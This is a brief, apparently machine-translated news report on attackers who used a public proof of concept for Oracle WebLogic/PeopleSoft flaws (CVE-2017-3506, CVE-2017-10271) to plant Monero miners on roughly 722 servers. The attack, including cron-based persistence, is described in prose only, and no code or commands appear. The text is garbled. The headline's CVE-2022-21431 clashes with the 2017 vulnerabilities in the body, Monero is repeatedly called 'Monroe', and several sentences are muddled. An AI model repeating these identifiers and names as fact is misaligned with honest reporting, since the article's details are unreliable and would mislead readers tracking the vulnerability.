Hacker use Oracle Application Server bug to mine cryptocurrencies

CVE-2022-21431

Security researchers report that attackers are exploiting PeopleSoft/WebLogic app server to perform a batch digital currency mining activity. Director of research at SANS Institute of Technology Johannes  Ullrich released report pointed out that a hacker to earn at least 611 Monroe currency, at current prices to calculate the total price of about $ 226,000.

Ullrich said the attacker used exploit script that has been published Lian Zhang, a Chinese security researcher at the end of December 2017 for a vulnerability (CVE 2017-3506). After the patch for CVE 2017-3506 was released by Oracle in April 2017, a CVE-2017-10271 vulnerability was found due to an incomplete fix.

Oracle Application Server

 

Ullrich said shortly after the launch of the PoC, attackers reported that attackers used the PoC to install cryptocurrency mining programs to launch attacks on servers hosted by Digital Ocean, GoDaddy, Verizon Business Services and Athenix.

Ullrich said the series of attacks are not targeted and are generally affected globally. Once someone has posted exploits, common hackers can crash WebLogic/PeopleSoft servers. The attackers installed legal Monroe mining packages on 722 vulnerable WebLogic and PeopleSoft systems. Many of these systems run on public cloud services, with over 140 systems running on Amazon AWS public clouds, a few servers on other hosting and cloud services, and about 30 on Oracle’s public cloud services.

Using vulnerability (CVE 2017-3506) code to make scanning for vulnerable systems simple, the entire publicly exposed, unpatched Oracle Web Application Server can quickly become the victim of these attacks. However, as mining tool scripts kill “java” processes on target servers, these mining activities were quickly discovered by researchers.

The installer used by the attacker in the above Monroe attack is a simple bash script that issues commands to find and kill other blockchain mining programs that may have existed before and to create cron scheduled tasks to download and launch the mining tool.

Ullrich reminded the victims that the server should not simply be patched and the mining program should be removed to fix the server, as sophisticated attackers may use more advanced techniques to hide the task. The durable mechanism used in this case is a cron timing task but does not rule out other more persistent mechanisms that are harder to detect in order to achieve long-term control of the target device.

Reference: SANS